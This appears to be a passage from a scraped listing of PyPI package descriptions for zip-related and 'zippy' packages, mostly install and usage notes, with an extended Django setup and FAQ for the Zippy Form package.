format reading capabilities subclassSong(singular) and create a_set_artist_from_EXT, where EXT is the extension of the music format you want to add. You’ll also need to initializeSongswith your new song class.So if I wanted to add.spfplaylists and.musaudio:class MusSong(zipls.Song): def _set_artist_from_mus(self): # and then probably: from mutagen.mus import Mus self.artist = Mus(self.path)['artist'][0] class SpfSongs(zipls.Songs): def _songs_from_spf(self, playlist): # add songs songs = SpfSongs('path/to/playlist', MusSong)Works Withplaylist formats:.pls.xspf.m3uA variety of common audio formats. (Ogg Vorbis, MP3/4, FLAC…) Basically everything supported bymutagenshould workContact and CopyingMy name’s Brandon, email me [email protected], and the project home page ishttp://bitbucket.org/quodlibetor/zipls.Basically do whatever you want, and if you make something way better based on this, lemme know.Copyright (C) 2010 Brandon W [email protected] program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
zipmigo
ZipmigoZipmigo is intended to assist fledgling data analysts and scientists with the process of downloading a zip file via http and unzipping it into the working directory when working in a notebook environment, saving them time and energy wading throughos,requests, and running shell commands to inspect the directory structure.StoryThis package was born of the author's hatred for recursive folders within zip files, as well as her need to use the same commands over and over again to download & unpack zip archives. Over the course of a project, she found herself constantly reusing code snippets - a sign that one should wrap it up into a script. However, she was working in google colab, which was designed for collaborative notebook workflows. It seemed that distributing a package on PyPi was the easiest way to import a script into colab for her audience, and thus zipmigo was born.InstallationZipmigo is available for commandline installation from PyPi viapip install zipmigo.Google ColabRun!pip install zipmigoFrom Sourcegit clone https://github.com/kaszklar/zipmigo.gitto your directory of choice.cd zipmigoand install withpython setup.py install.ExamplesImportingimport zipmigoDownload a zip fileDownload a file to the current working directory. The status of the connection and the progress of the download will be printed out.zipmigo.download("https://geo.nyu.edu/download/file/harvard-ntadcd106-shapefile.zip",'congressdistricts.zip')Print out the contents of the current working directory & subdirectorieszipmigo.list_dir()UnzipUnpack zip file into current directory. If the archive has only directories in the root, those directories will be placed in the current working directory.zipmigo.unzip("congressdistricts.zip")Release History[1.1.0] 2020.08.12Refactor for namespaceAdjust download control flow[1.0.1] 2020.05.05Some error handling and type assertionsCorrect readme instructions[1.0.0] 2020.02.13Initial Release 🎉Future features?Inspect zip archive prior to openingExtract a single file from the archive
zipminator
Zipminator

Zipminator is a lightweight Python package with two main functionalities: Zipndel and Unzipndel, for zipping or unzipping a password-protected pandas DataFrame file and then deleting the original file.

Example usage

pip install zipminator

zipit

from zipminator.zipit import Zipndel
import pandas as pd
import getpass
import zipfile
import os

# create instance of Zipndel and call zipit method
zipndel = Zipndel(file_name='df', file_format='csv')
df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6], 'C': [7, 8, 9]})
zipndel.zipit(df)

unzipit

from zipminator.unzipit import Unzipndel

# create instance of Unzipndel and call unzipit method
unzipndel = Unzipndel(file_name='df', file_format='csv')
df = unzipndel.unzipit()
df
zipndel
No description available on PyPI.
zipnish
A micro-service monitoring tool based on Varnish Cache.DocumentationChangelogSource
zipo
zipp

This is a .zip file aggregate.

Installation

pip install zipp

import zipp

# backup2zip
zipp.backup2zip(floder=, backupfilename=)

# decompression
zipp.decompression(name=)
zip_open
zip_openopen file from nested zip file archive.If you use static file like as ‘data.zip’ and open this from your python code, Your program will become likeopen(os.path.join(os.path.dirname(__file__),'data.zip')). But if your packages are packed into packages.zip file (zipped-egg, or cases to gather in one file on Google App Engine matter), your code doesn’t work fine.In this situation, the file path of data.zip becomes/path/to/packages.zip/data.zip, then your program can’t open the data.zip file.zip_openpackage solves this problem.FeaturesOpen file from nested zip archive file path/name.Open file from nested zip archive file-like-object.Using sample1: open the file from zip filepackages1.zip is:packages1.zip + file1.txtOpen file1.txt:>>> from zip_open import zopen >>> fobj = zopen('packages1.zip/file1.txt') >>> data = fobj.read() >>> print(data) I am file1.txt, ok.You can specifiy zopen subpath args:>>> fobj = zopen('packages1.zip', 'file1.txt') >>> print(fobj.read()) I am file1.txt, ok.These code samples equivalent to below code:>>> from zipfile import ZipFile >>> zipobj = ZipFile('packages1.zip') >>> data = zipobj.read('file1.txt') >>> print(data) I am file1.txt, ok.Using sample2: open the file from nested zip filepackages2.zip is:packages2.zip + data2.zip + file2.txtOpen file2.txt:>>> from zip_open import zopen >>> fobj = zopen('packages2.zip/data2.zip/file2.txt') >>> print(fobj.read()) I am file2.txt, ok.If you want to open from file-like-object, you can call:>>> zip_fileobj = open('packages2.zip', 'rb') >>> fobj = zopen(zip_fileobj, 'data2.zip/file2.txt') >>> print(fobj.read()) I am file2.txt, ok.then you also call:>>> from StringIO import StringIO >>> zip_payload = open('packages2.zip', 'rb').read() >>> zip_fileobj = StringIO(zip_payload) >>> fobj = zopen(zip_fileobj, 'data2.zip/file2.txt') >>> print(fobj.read()) I am file2.txt, ok.Using sample3: open the file included in package oneselfpackages3.zip is:packages3.zip + foo.py + file1.txt + data3.zip + file3.txtfoo.py:import os from zip_open import zopen def loader(filename): fobj = zopen(os.path.join(os.path.dirname(__file__), filename)) return fobjexecute loader() from interactive shell:>>> import sys >>> sys.path.insert(0, 'packages3.zip') >>> import foo >>> fobj = foo.loader('file1.txt') >>> print(fobj.read()) I am file1.txt, ok. >>> fobj = foo.loader('data3.zip/file3.txt') >>> print(fobj.read()) I am file3.txt, ok.Requirements and dependenciesRequirement: Python 2.4 or laterDependency: Nothing.ToDoAdd tar.gz file support.Add using sample document for egg archive.Support Python3Add module import feature.History0.2.1 (Unreleased)fixed: test broken (open file as binary)use distutils.core.setup if no setuptools.0.2.0 (2011-11-29)Change license from PSL to Apache License 2.0Add feature: open from file-like-object.0.1.0 (2010-7-19)first release
zipp
A pathlib-compatible Zipfile object wrapper. Official backport of the standard library Path object.

Compatibility

New features are introduced in this third-party library and later merged into CPython. The following table indicates which versions of this library were contributed to different versions in the standard library:

zipp   | stdlib
3.15   | 3.12
3.5    | 3.11
3.2    | 3.10
3.3 ?? | 3.9
1.0    | 3.8

Usage

Use zipp.Path in place of zipfile.Path on any Python.

For Enterprise

Available as part of the Tidelift Subscription. This project and the maintainers of thousands of other packages are working with Tidelift to deliver one enterprise subscription that covers all of the open source you use. Learn more.
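As a brief usage sketch (assuming an archive example.zip that contains a member readme.txt; not taken from the project docs):

import zipp

# Wrap an archive and browse it like a pathlib.Path
root = zipp.Path('example.zip')
for entry in root.iterdir():
    print(entry.name, entry.is_file())

# Navigate with '/' and read a member directly
print((root / 'readme.txt').read_text(encoding='utf-8'))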
zippath
No description available on PyPI.
zipper
Zipper [![Build Status](https://travis-ci.org/trivio/zipper.png)](https://travis-ci.org/trivio/zipper)
======

A data structure, first described by Huet, used to traverse and manipulate immutable trees. This library is a port of the zipper implementation found in Clojure.

Usage
-----

The zipper module provides several functions for creating a Loc object which represents the current focal point in the tree.

```
>>> import zipper
>>> top = zipper.list([1, [2, 3], 4])
>>> print top.down().right().node()
[2, 3]
>>> print top.down().right().down().node()
2
>>> print top.down().right().down().replace(0).root()
[1, [0, 3], 4]
```
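Building only on the calls shown above, here is a small sketch of editing a nested leaf and rebuilding the tree (an illustration, not taken from the project's own docs):

import zipper

top = zipper.list([1, [2, 3], 4])

# Walk to the nested 3: down to 1, right to [2, 3], down to 2, right to 3
loc = top.down().right().down().right()

# Replace it and zip back up to get the rebuilt immutable tree
print(loc.replace(99).root())   # expected: [1, [2, 99], 4]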
zipper-easy-module
No description available on PyPI.
zippie
UNKNOWN
zippity
UNKNOWN
zippity-py
Zippity

dum lil CLI to collect TODOs for ChatGPT

Installation

pipx install zippity_py

Usage

After installation, you can use the CLI by running:

> zpt --help
Usage: zpt [OPTIONS] [SOURCE_DIRECTORY]
Options:
  -e, --extensions TEXT    (Default: '.py,.js,.ts')
  -r, --result_file PATH   (Default: 'ZIPPITYDO_EXAMPLE.md')
  -t, --template_file PATH
  --help

Template

Templates are jinja markdown files that get passed a list of these:

FileTodos = TypedDict(
    "FileTodos",
    {
        "todos": List[Todo],
        "content": str,
        "language": str,
        "mimetype": str,
        "name": str,
    },
)

Each FileTodo will have a list of todos, like this:

Todo = TypedDict(
    "Todo",
    {
        "line_number": int,
        "text": str,
    },
)

The default template is in template/template.md; once compiled it looks like this:

Contributing

Contributions are welcome. Please make sure to update tests as appropriate.

License

MIT
zippo
No description available on PyPI.
zippy
UNKNOWN
zippydoc
UNKNOWN
zippyform
Zippy Form is a Django package that simplifies the creation of dynamic forms without requiring any coding.SetupTo integrate the Zippy Form package into your Django project, follow these steps:1. Add Package NameOpen your Django project'ssettings.pyfile.Add the package namezippy_formto your project'sINSTALLED_APPS.2. MigrateOpen your terminal or command prompt.Run the following command to apply the migrations:python manage.py migrate3. Update URL ConfigurationIn your Django project'surls.pyfile, add the following URL path to include the Zippy Form package's URLs:path('form/', include('zippy_form.urls'))By following these setup instructions, you'll successfully integrate the Zippy Form package into your Django project, allowing you to create dynamic forms with ease.API DocumentationClick Hereto view API Documentation.Notes To Developer# Subscribing to Zippy Form Events Using Callback FunctionWhen specific functionalities occur on the Zippy Form, events will be triggered and you can subscribe to these events to receive data in your Django application.Below is a list of events that you can subscribe to:New Account Created:This event is triggered when a new account is successfully created. To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_account_createReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_ACCOUNT_CREATE = zippyform_after_account_createReplace "zippyform_after_account_created" with the name of the function you imported.New Form Created:This event is triggered when a new form is successfully created. To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_form_createReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_FORM_CREATE = zippyform_after_form_createAfter Form Submit:This event is triggered when a form submitted(save or update). To subscribe to these event and receive data in your Django app, follow the below stepsOpen your project's settings file (usually namedsettings.py).Import the function that you want to use for subscribing the event. For example:from yourapp.event_subscriptions import zippyform_after_form_submitReplace "yourapp.event_subscriptions" with the actual path to your event_subscription function.Add the below snippet to the settings file,ZF_EVENT_AFTER_FORM_SUBMIT = zippyform_after_form_submit# Subscribing to Zippy Form Events Using Webhooks1. Enabling Webhooks for Zippy Form:To enable webhooks for your project,Modify your .env file:Open your Django project's.envfile. If it doesn't exist, create one in your project's root directory.Add the following environment variables to enable webhooks:ZF_ENABLE_WEBHOOK=True ZF_WEBHOOK_BROKER_URL=amqp://localhost ZF_WEBHOOK_BACKEND=rpc://Install the python-dotenv Package:Ensure that you have thepython-dotenvpackage installed in your Django application. 
If it's not installed, you can install it using pip:pip install python-dotenvImport and load .env variables in your settings.py file:In your Django project'ssettings.pyfile (usually found in the project's root directory), import and load the environment variables from the.envfile.from dotenv import load_dotenv import os load_dotenv() ZF_ENABLE_WEBHOOK = str(os.getenv('ZF_ENABLE_WEBHOOK')) ZF_WEBHOOK_BROKER_URL = str(os.getenv('ZF_WEBHOOK_BROKER_URL')) ZF_WEBHOOK_BACKEND = str(os.getenv('ZF_WEBHOOK_BACKEND'))ZF_ENABLE_WEBHOOK:Set this toTrueto enable webhooks for Zippy Form.ZF_WEBHOOK_BROKER_URL:Add the broker URL for Celery (e.g., RabbitMQ URL).ZF_WEBHOOK_BACKEND:Configure the webhook backend (e.g., RabbitMQ).2. Starting a Celery Worker for Zippy Form:You have the flexibility to choose between two approaches for starting the Celery worker. Please follow one of the methods below:Approach 1 (Preferred for Docker Setup):Auto-generate the Celery setup file at the project's root folder by running the following command:python manage.py celery_initOnce the "celery_init.py" file is created, you can start the Celery worker by running the file using the following command:python3 celery_init.pyApproach 2:Create a Bash file (celery.sh) in the root folder of your Django project.Add the following contents to the celery.sh file:export DJANGO_SETTINGS_MODULE='your_project_name.settings' celery -A zippy_form worker -l info --loglevel=info --logfile=celery.log -DSetyour_project_nameto the actual name of your Django project.Once thecelery.shfile is created, run the following command within your virtual environment from the Django project's root folder:source celery.shThis command will start the Celery worker process for Zippy Form in the background.Celery logs will be saved at the Django project's root folder with the namecelery.log.Below is a list of events that you can subscribe to:New Form Created:This event is triggered when a new form is successfully created.After Form Submit:This event is triggered when a form submitted(save or update).# Zippy Form API Hooks1. API: Dynamic Form / Create Form:To handle a specific logic before form created(eg. restrict form creation based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_BEFORE_CREATE_FORM = from yourapp.subscriptions import zippyform_before_create_formReplace "zippyform_before_create_form" with the name of the function you imported.To return an error when creating a form, the hook should return this response:def zippyform_before_create_form(account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when creating a form, the hook should return this response:def zippyform_before_create_form(account_id): response = {} response['return_response'] = False return response2. API: Form Builder / List All Forms With Pagination:To handle a specific logic before response returned(eg. 
restrict form response based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_LIST_ALL_FORMS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_format_form_responseReplace "zippyform_format_form_response" with the name of the function you imported.To include additional data on the form list response:def zippyform_format_form_response(response_data, form_id, account_id): response_data['can_access_form'] = True return response_data3. API: Form Builder / List All Form Fields:To handle a specific logic before response returned(eg. restrict form field response based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_FORM_BUILDER_LIST_ALL_FORM_FIELDS_BEFORE_RESPONSE = from yourapp.subscriptions import zippyform_form_builder_before_form_fields_responseReplace "zippyform_form_builder_before_form_fields_response" with the name of the function you imported.To return an error when listing form fields, the hook should return this response:def zippyform_form_builder_before_form_fields_response(current_frontend_url, account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when listing form fields, the hook should return this response:def zippyform_form_builder_before_form_fields_response(current_frontend_url, account_id): response = {} response['return_response'] = False return response4. API: Form Builder / List All Form Fields:To format the API response(eg. add/remove additional data to form field response),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_FORM_BUILDER_LIST_ALL_FORM_FIELDS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_form_builder_format_form_fields_responseReplace "zippyform_form_builder_format_form_fields_response" with the name of the function you imported.To include additional data on the form field list response:def zippyform_form_builder_format_form_fields_response(response_data, form_id, account_id): response_data['can_access_builder'] = True return response_data5. API: Dynamic Form / Submit Form:To handle a specific logic before form submit(eg. restrict submitting form based on user subscription plan),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_BEFORE_SUBMIT_FORM = from yourapp.subscriptions import zippyform_before_form_submitReplace "zippyform_before_form_submit" with the name of the function you imported. Note: This hook will be called before the form fields validatedTo return an error when submitting form, the hook should return this response:def zippyform_before_form_submit(form_id, account_id): response = {} response['return_response'] = True response['status'] = "error" response['status_code'] = 400 response['msg'] = "Error Message" return responseTo skip return an error when submitting form, the hook should return this response:def zippyform_before_form_submit(form_id, account_id): response = {} response['return_response'] = False return response6. API: Dynamic Form / List All Form Fields:To format the API response(eg. 
add/remove additional data to form field response),follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_API_DYNAMIC_FORM_LIST_ALL_FORM_FIELDS_FORMAT_SUCCESS_RESPONSE = from yourapp.subscriptions import zippyform_dynamic_form_format_fields_responseReplace "zippyform_dynamic_form_format_fields_response" with the name of the function you imported.To include additional data on the form field list response:def zippyform_dynamic_form_format_fields_response(response_data, form_id, account_id): response_data['can_access_form'] = True return response_data# Overwrite Zippy Form DefaultsApplication Type:By default, Zippy Form is set to operate inStandalonemode. However, to configure Zippy Form to support SaaS applications (Multi-Tenant Applications), include the following line in your project settings file:ZF_APPLICATION_TYPE = 'saas'List Per Page Size:To overwrite the default per page size of list (which is set to 6), you can configure it in the project settings file by adding the following line:ZF_LIST_PER_PAGE = 10Replace "10" with your desired page size value. This allows you to customize the default per page size for the Zippy Form list.Form Field Label Unique:If you need to allow duplicate values for form field labels, you can configure it in the project settings file by adding the following line:ZF_IS_FIELD_LABEL_UNIQUE = FalseFAQ# Q1: Does Zippy Form support multi-step forms?A:Yes, Zippy Form does support multi-step forms, allowing you to create and manage forms with multiple steps to collect information in a structured and user-friendly manner.# Q2: Can a form be created without an account?A:No, an account needs to be created before a form can be created because each form needs to be mapped to an account.# Q3: How many accounts can be created?A:There is no limit to creating accounts. If you are using the package in a standalone application, you can create a single account and map all the forms to it. If you are using the package in a multi-tenant application, you can create an account for each tenant and map the forms under that respective account.# Q4: How can I synchronize my application's user account (tenant) with Zippy Form?A:When creating an account in Zippy Form, include the unique ID associated with your application's user account(tenant) in themeta_detailparameter. This unique ID serves as a linkage between your application and Zippy Form. After you've passed the unique ID, you can retrieve it when Zippy Form events occur. Whether you're using event callback functions or webhooks, themeta_detaildata will be included in the event payload.# Q5: Can I include additional details when creating a form in Zippy Form?A:Yes, you can pass additional details when creating a form in Zippy Form using themeta_detailparameter. This allows you to provide extra information or context related to the form. Subsequently, when Zippy Form events occur, whether you're utilizing event callback functions or webhooks, themeta_detaildata you passed will be included in the event payload, enabling you to access and use it as needed.# Q6: Why are form field labels set as unique?A:Form field labels are set as unique by default to serve as unique identifiers when syncing form submission data to a Google Sheets, ensuring accurate data organization and management. 
If you wish to override this default behavior, please refer to theOverwrite Zippy Form Defaults > Form Field Label Uniquesection for instructions.# Q7: What does receiving a "permission_error" with a 403 code mean when interacting with an API?A:If you encounter a "permission_error" with a 403 status code, it typically indicates that there is an issue with authentication. This error commonly occurs when you have either missed passing theZF-SECRET-KEYtoken in the header of your API request or theZF-SECRET-KEYtoken provided is invalid. To resolve this, ensure that you include the correct and validZF-SECRET-KEYtoken in your API request's header for proper authentication.# Q8: Where can I obtain the "ZF-SECRET-KEY"?A:You can use your Zippy Form account ID as theZF-SECRET-KEY. This ID uniquely identifies your Zippy Form account. Obtain your Zippy Form account ID by making an API request to theForm Builder / List All Accountsendpoint. This API call will provide you with the necessary account ID to use as theZF-SECRET-KEYin your integration.# Q9: Why am I receiving an "Invalid Form ID" error message when attempting to submit a form?A:You will encounter the "Invalid Form ID" error message when submitting a form if the following conditions are not met:Form Status:The form can only be submitted if its status isactive. If the form is in any other state such asdeleted,inactive, ordraftyou will receive this error message.Form ID Validity:Ensure that the form ID you have provided is accurate and corresponds to an existing, active form. An incorrect or nonexistent form ID will trigger the "Invalid Form ID" error.# Q10: Why are the fields I created not displaying on the form?A:Only active fields will be displayed on the form for submission. To resolve this, you can use theForm Builder / Update FormAPI to update the field status fromdrafttoactiveensuring that they are visible and can be submitted on the form.# Q11: Can I handle my own business logic when an account is created, a form is created, or a form is submitted in Zippy Form?A:Yes, you have the flexibility to handle your own business logic when working with Zippy Form. The approach depends on whether you've installed the Zippy Form package in a standalone application or a multi-tenant application:Standalone Application:If you've integrated Zippy Form into a standalone application, you can subscribe to Zippy Form events using callback functions. This feature enables you to access event data within any function you add to your application.Multi-Tenant Application:For multi-tenant applications, you can subscribe to Zippy Form events using webhooks. Webhooks provide a way to receive real-time notifications about Zippy Form events, and you can handle these events in your application according to your business needs.For detailed instructions on how to implement these approaches, please refer to the "Notes To Developer" section in the Zippy Form documentation, which provides comprehensive information on how to use callback functions and webhooks for event handling.# Q12: Does the "After Form Submit" event trigger after each form step or only at the final step?A:The "After Form Submit" event typically triggers after the last form step has been completed and the entire form has been submitted. This event occurs once the user has finished providing input and confirmed their submission. 
It does not trigger after each form step but rather at the conclusion of the entire form submission process.# Q13: Does Zippy Form support unique validation?A:Yes, Zippy Form supports unique validation. Unique validation checks submitted entries in forms withdraftandactivestatuses to ensure that values are unique, preventing duplicate entries.# Q14: Can I delete an uploaded file?A:Yes, you can delete an uploaded file. If the field is set as not required, you can simply pass "reset" to the field key when updating the entry, and it will delete the previously uploaded file.# Q15: How can I update a form without adding a new file and retaining the old file?A:To update a form without adding a new file and retain the old file, you can pass an empty value to the field key. This action will skip the required validation during the update and keep the old file intact.# Q16: Why is my media not saving to the media folder in Zippy Form?A:Zippy Form does not control the location where media is saved; instead, it relies on your Django application's configuration. To ensure your media is saved to the correct folder, follow these steps:1. Configure Django Settings:Open your Django project's settings file and add the following snippets:import os API_URL = "http://127.0.0.1:8000" MEDIA_ROOT = os.path.join(BASE_DIR, 'media') MEDIA_FOLDER = '/media/' MEDIA_URL = API_URL + MEDIA_FOLDER2. Update URL Configuration:In your Django project's urls.py file, include the ZippyForm package's URL patterns, and make sure to handle static media files by adding the following:from django.conf import settings from django.conf.urls.static import static urlpatterns = [ ... , path('form/', include('zippy_form.urls')), # Include Zippy Form package's URL patterns here ] + static(settings.MEDIA_FOLDER, document_root=settings.MEDIA_ROOT)By following these steps and configuring your Django project correctly, media files should be saved to the specified media folder.# Q17: How can I make my submitted form data sync to Google Sheet?A:To sync the submitted form data to Google Sheet, follow these steps:Open your project's settings.py file.Add the following snippet to enable the syncing of form submissions to Google Sheet:ZF_GSHEET_SYNC_FORM_SUBMISSION = TrueAdditionally, you need to provide the Google Sheet credentials. Add your credentials to the Zippy Form project settings by assigning them toZF_GSHEET_CREDENTIALS.Sample Gsheet Credentials:ZF_GSHEET_CREDENTIALS = { "type": "service_account", "project_id": "gsheet-test-******", "private_key_id": "", "private_key": "", "client_email": "", "client_id": "", "auth_uri": "", "token_uri": "", "auth_provider_x509_cert_url": "", "client_x509_cert_url": "", "universe_domain": "" }By following these steps, your form submissions will be automatically synchronized with Google Sheet. This ensures that your data is efficiently organized and accessible for further analysis or processing.# Q18: Where can I find the Google Sheet URL to view the data submitted through the form?A:After enabling Google Sheet form submission sync and adding Google Sheet credentials:Create a new form.Once the form is created, Google Sheet will automatically be created and shared with the admin email provided in your account. 
You can also find the Google Sheet URL on theForm Builder / List All FormsAPI.# Q19: Why is the Google Sheet document created blank after creating a new form?A:The Google Sheet document remains blank initially because the headers for the sheet are synced only when triggering theForm Builder / Update FormAPI. This synchronization ensures that only the active fields from the form are transferred to the Google Sheet as headers, allowing for precise and organized data tracking.# Q20: Can I move/rearrange columns in Google Sheet to different positions directly within the sheet?A:Yes, you can freely move columns to different positions within the Google Sheet. However, it's essential to ensure that you do not modify the column headings while moving them, as altering column headings can lead to synchronization issues with associated data.# Q21: When running celery.sh(source celery.sh) in the virtual environment, I receive the warning "A node named celery@pc-ThinkPad-E14-Gen-3 is already using this process mailbox." How can I fix this issue?A:The warning message "A node named celery@pc-ThinkPad-E14-Gen-3 is already using this process mailbox!" indicates that you have multiple Celery workers running with the same node name, and there's an attempt to use the same process mailbox for these workers. In Celery, each worker should have a unique node name to avoid conflicts.The node name typically consists of the word "celery" followed by a hostname or some identifier that distinguishes it from other workers. In your case, the node name is "celery@pc-ThinkPad-E14-Gen-3," which is derived from your computer's hostname.To resolve this issue:FKill All Running Celery Workers:Run the following command to terminate all running Celery workers:pkill -f "celery"This will stop all Celery workers gracefully and prevent conflicts.Restart Celery Worker process for Zippy Form:To restart the Celery Worker Process for Zippy Form,follow the steps provided in theSubscribing to Zippy Form Events Using Webhookssection, specifically in theStarting a Celery Worker for Zippy Formsubsection.By following these steps, Celery will work properly in your environment.# Q22: How many webhooks can be added to an account?A:There is no limit for adding webhooks to an account. You can add webhooks to an account using theForm Builder / Create WebhookAPI.# Q23: In what timezone will date and timestamps be displayed?A:Date and timestamp will be based on the timezone set for the account.# Q24: What payment gateways are supported in Zippy Form?A:As of now, Zippy Form exclusively supports the Stripe Payment Gateway. We're continuously evaluating and working on integrating additional payment gateways to offer more options in the future.# Q25: What credentials are required to integrate the Stripe Payment Gateway into Zippy Form?A:To integrate the Stripe Payment Gateway into Zippy Form, both test and live secret keys, public keys are necessary. 
Regardless of whether your application is Standalone or SaaS (Multi-Tenant), follow these steps:Store your Stripe test and live secret keys, public keys securely in a.envfile.Access and utilize these keys within the projectsettings.pyfile using the following configurations:# For Development Environment ZF_PAYMENT_GATEWAY_STRIPE_SECRET_KEY_DEV = "your_test_secret_key_here" ZF_PAYMENT_GATEWAY_STRIPE_PUBLIC_KEY_DEV = "your_test_public_key_here" # For Live/Production Environment ZF_PAYMENT_GATEWAY_STRIPE_SECRET_KEY_LIVE = "your_live_secret_key_here" ZF_PAYMENT_GATEWAY_STRIPE_PUBLIC_KEY_LIVE = "your_live_public_key_here"Ensure to replace "your_test_secret_key_here" and "your_live_secret_key_here" with your respective Stripe test and live secret keys & "your_test_public_key_here" and "your_live_public_key_here" with your respective Stripe test and live public keys. This setup ensures secure and efficient payment processing within Zippy Form, regardless of your application type.If your application is SaaS (Multi-Tenant), follow these steps:Store your Stripe Connect URL securely in a.envfile.Access and utilize these keys within the projectsettings.pyfile using the following configurations:# For Development Environment ZF_PAYMENT_GATEWAY_STRIPE_CONNECT_URL_DEV = "your_test_stripe_connect_url_here" # For Live/Production Environment ZF_PAYMENT_GATEWAY_STRIPE_CONNECT_URL_LIVE = "your_live_stripe_connect_url_here"Ensure to replace "your_test_stripe_connect_url_here" and "your_live_stripe_connect_url_here" with your respective Stripe test and live Connect URL.# Q26: How can I configure the application fee percentage to collect when a tenant receives payment from an end user using Zippy Form in a SaaS application?A:To set the application fee percentage for Stripe within Zippy Form's SaaS application, follow the below stepsOpen your project's settings file (usually namedsettings.py).Add the below snippet to the settings file,ZF_PAYMENT_GATEWAY_STRIPE_APPLICATION_FEE_PERCENTAGE = from yourapp.subscriptions import stripe_application_fee_percentageReplace "stripe_application_fee_percentage" with the name of the function you imported. Note: Function imported here need to return a positive integer value# Q27: Why isn't the payment form collecting payments?A:If your payment form isn't collecting payments, ensure you've completed these steps:Enable Payment:Ensure that the payment feature is activated for the form.Set Primary Payment Gateway:Set the primary payment gateway within your account settings.Configuration Check:Verify that the payment gateway keys are correctly configured in your project settings.py file.Ensuring payment functionality is enabled, setting a primary payment gateway, and correctly configuring the payment gateway keys within the project settings are essential to facilitate successful payment collection through the form.# Q28: What is the difference between fixed and dynamic price in the payment form settings?A:In the context of payment form settings:Fixed Price:This option is suitable when there's a pre-defined, unchanging amount that needs to be collected upon form submission. For instance, it's commonly used in scenarios like application forms, where the payment amount remains constant regardless of user input.Dynamic Price:Select this option when you want users to input the amount they wish to pay upon form submission. 
In this case, users have the flexibility to enter the payment amount themselves, such as in donation forms or scenarios where the payment amount can vary based on user discretion. The submitted form collects the specified amount provided by the user.# Q29: How can I incorporate my custom form URL into the Custom Form QR code?A:To incorporate your custom form URL into the Custom Form QR code,Modify your .env file:Open your Django project's.envfile. If it doesn't exist, create one in your project's root directory.Add the following environment variables to enable webhooks:ZF_CUSTOM_FORM_FRONTEND_URL='www.domain.com/form' ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL='www.domain.com/custom_form'Import and load .env variables in your settings.py file:In your Django project'ssettings.pyfile (usually found in the project's root directory), import and load the environment variables from the.envfile.from dotenv import load_dotenv import os load_dotenv() ZF_CUSTOM_FORM_FRONTEND_URL = str(os.getenv('ZF_CUSTOM_FORM_FRONTEND_URL')) ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL = str(os.getenv('ZF_CUSTOM_FORM_NON_ADMIN_FRONTEND_URL'))ReleasesVersionFeatures1.0.0Form Builder, Dynamic Form, Subscribing To Events Using Callback Function1.1.0Sync Submitted Form Entries To Google Sheet1.2.0Webhook Support1.3.0Payment Form
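Tying together the event-callback subscription described under "Notes To Developer" above, a subscriber function might look roughly like the following. This is only a sketch: the exact signature and payload shape of the callback are assumptions and are not documented here; the docs only state that event data, including any meta_detail you attached, is passed to the subscribed function.

# Hypothetical sketch of an event subscriber; the argument name and payload
# structure are assumptions, not part of the documented API.
def zippyform_after_form_submit(event_data):
    meta_detail = event_data.get('meta_detail', {}) if isinstance(event_data, dict) else {}
    # Run your own business logic here, e.g. sync the submission to your app.
    print("Zippy Form submission received:", meta_detail)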
zippy-pipeline
# ZIPPY### The### ZIppy### Pipeline### Prototyping### sYstemZIPPY is a powerful, easy-to-use NGS pipeline prototyping system, with batteries included. ZIPPY helps you create JSON-based pipeline specifications, which it then uses to execute a series of pipeline stages, with no user-written code required.## With ZIPPY, you can:- Generate a new pipeline without any coding required- Auto-generate parameters files from just a list of stages- Use our ultra-modular system for adding new modules, which can then interface with every other module- Make a custom pipeline in 10 minutes or less## ZIPPY includes a variety of modules, including:- Bcl2Fastq- BWA- Picard alignment stats- RSEM- MACS- BAM subsamplingThere will be many more to come! (See the full list of modules [here](https://github.com/Illumina/zippy/wiki/Zippy-modules)).## Limitations:ZIPPY uses black magic that relies upon the CPython implementation of Python. Currently, only CPython 2.7 is supported. ZIPPY also requires several python modules. To make life easier, an executable version of ZIPPY is available (see the releases page!).### Running ZIPPY from sourceIf you would like to run ZIPPY from source, there are a couple of things to note.- You must use CPython 2.7- You must install the modules 'commentjson' and 'pyflow' (note: pyflow is not in pypi, but can be found [here](https://github.com/Illumina/pyflow)). You may optionally install the package 'meta' which may improve the coverage of parameters from make_params if you do not have the source of some of your imported modules (e.g., only .pyc files).- Run the tests file make_params_test.py and see if it's OK!# Using ZIPPY:0. Install ZIPPY by using 'pip install --process-dependency-links zippy-pipeline'1. Make a proto-workflow file.A proto-workflow is a very simple json file that lists the pipeline stages you want, in the order you want them. Here's a simple proto-workflow that I use for some RNA-seq applications:```{"stages": ["bcl2fastq", "rsem"]}```Yeah, that's really it.2. Compile the 